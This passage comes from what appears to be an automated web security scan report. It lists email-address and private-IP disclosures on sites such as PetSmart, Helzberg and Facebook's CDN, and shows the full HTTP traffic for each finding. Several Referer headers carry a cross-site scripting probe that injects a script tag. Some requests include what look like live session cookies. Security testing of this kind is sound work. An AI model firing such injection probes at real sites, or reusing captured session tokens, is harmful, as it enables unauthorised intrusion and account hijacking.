Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:52 GMT
Content-Length: 9284

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...

20.36. https://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.helzberg.com
Path:   /includes/jquery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /includes/jquery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: https://www.helzberg.com/account/login.do?method=view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; fsr.a=1305542721305

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:27 GMT
ETag: "649-910d97c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:28 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.37. http://www.petsmart.com/js/LIB_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1
Cookie: __g_c=w%3A0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:49:53 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT
ETag: "53cb54-aa04-421c29a2f3640"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:49:53 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43524

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

20.38. https://www.petsmart.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<font class="details">(e.g. joe@aol.com)</font>
...[SNIP]...

20.39. https://www.petsmart.com/js/LIB_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: https://www.petsmart.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT
ETag: "53cb54-aa04-421c29a2f3640"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:18:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43524

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

20.40. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /assets/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511172437

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 12:23:28 GMT
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

20.41. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /assets/js/jquery/plugins/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com

Request

GET /assets/js/jquery/plugins/jquery.pngFix.js HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511172437

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:59:39 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 12:23:28 GMT
Content-Length: 4795

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

20.42. http://www.travelguard.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelguard.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

WebException@travelguard.com
webmaster@travelguard.com

Request

GET / HTTP/1.1
Host: www.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.travelguard.com&SiteLanguage=1033; EktGUID=a15d51f4-28a7-4b4a-80f5-62beb814a8df; EkAnalytics=newuser; ASP.NET_SessionId=xj4zcmmhhzhxmb30ab3nfl45; s_pers=%20s_pers_prop19%3Dus_direct%7C1463190243517%3B%20gpv_pageName%3Dus_direct%253A/%7C1305512043622%3B%20s_depth%3D1%7C1305512043625%3B%20s_pers_prop21%3D000329%7C1463190243630%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script id="EktronJS" ty
...[SNIP]...
.ca";
globalConfiguration.GLOBAL_Domain_TGBUY = "http://buy.travelguard.com";
globalConfiguration.GLOBAL_Domain_TGBUYSecure = "https://buy.travelguard.com";
globalConfiguration.GLOBAL_ErrorEmail = "WebException@travelguard.com";
globalConfiguration.GLOBAL_webEnvironment = "Live";
globalConfiguration.TGUS_McAfeeSECURE_Enabled = "1";
globalConfiguration.TGUS_VeriSign_Enabled = "1";
globalConfiguration.TGUS_SiteCatalyst_En
...[SNIP]...
edUrl = "/";
brandConfiguration.Arc = "000329";
brandConfiguration.BuyPhoneNumber = "1.800.826.4919";
brandConfiguration.SupportPhoneNumber = "1.715.345.0505";
brandConfiguration.ContactUsEmail = "webmaster@travelguard.com";
brandConfiguration.Field1 = ["Question 1", "Question 2"];
//]]>
...[SNIP]...

21. Private IP addresses disclosed
There are 89 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


21.1. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://includes.petsmart.com
Path:   /homepage/redesigned/images/logo-facebook.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.228

Request

GET /homepage/redesigned/images/logo-facebook.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT
ETag: "f28003-78-4662104f59580"
Accept-Ranges: bytes
Content-Length: 120
Content-Type: image/gif

GIF89a.......;Y....m.....ay.Eb.`x....!.......,..........=x.....I.$.j...A0u......\....."@R...o..>..XQ.... .,..I&.y..(...;

21.2. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://includes.petsmart.com
Path:   /homepage/redesigned/images/logo-twitter.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.96.228

Request

GET /homepage/redesigned/images/logo-twitter.gif HTTP/1.1
Host: includes.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.228CKMYW; path=/
Date: Mon, 16 May 2011 10:49:56 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT
ETag: "f28004-175-46620e43c8240"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: image/gif

GIF89a.....$..........|........d..t.......................<.....l........$....................T........D..L...........\.................................................................................
...[SNIP]...

21.3. http://rya.rockyou.com/ams/ptrck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /ams/ptrck.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.130.8.33

Request

GET /ams/ptrck.php?code=td9d4f46 HTTP/1.1
Host: rya.rockyou.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.3
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www236.rockyou.com took D=10868 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125


<!-- Active server list retrived from APC Store -->
<!-- Using Ad Server http://10.130.8.33:8080/adserver/pixel -->

21.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1baeb5cbc%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff38148ebcc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1409
Expires: Mon, 16 May 2011 10:57:37 GMT
Date: Mon, 16 May 2011 10:34:08 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

21.5. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y2/r/Bj5jbUlrgiA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/y2/r/Bj5jbUlrgiA.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 17:15:32 GMT
X-FB-Server: 10.138.16.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31041985
Expires: Wed, 09 May 2012 17:28:01 GMT
Date: Mon, 16 May 2011 10:41:36 GMT
Connection: close
Content-Length: 37236

/*1305048537,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["lIKWr"]); }

if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|\.)faceb
...[SNIP]...

21.6. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/vnjkQm4QANt.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yS/r/vnjkQm4QANt.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yS/r/vnjkQm4QANt.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:32 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31141619
Expires: Thu, 10 May 2012 21:08:38 GMT
Date: Mon, 16 May 2011 10:41:39 GMT
Connection: close
Content-Length: 68202

/*1305148153,169775559*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JYXUq"]); }

!function(){function a(b){return function(){if(this===window)throw new TypeError();return b.apply(this,argum
...[SNIP]...

21.7. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JS3nOGeZ6_r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yW/r/JS3nOGeZ6_r.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yW/r/JS3nOGeZ6_r.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 05 May 2011 04:10:28 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30909670
Expires: Tue, 08 May 2012 04:42:48 GMT
Date: Mon, 16 May 2011 10:41:38 GMT
Connection: close
Content-Length: 25640

/*1304916151,169775815*/

if (window.CavalryLogger) { CavalryLogger.start_js(["evTQd"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

21.8. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yX/r/fyAhkjMytaS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yX/r/fyAhkjMytaS.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
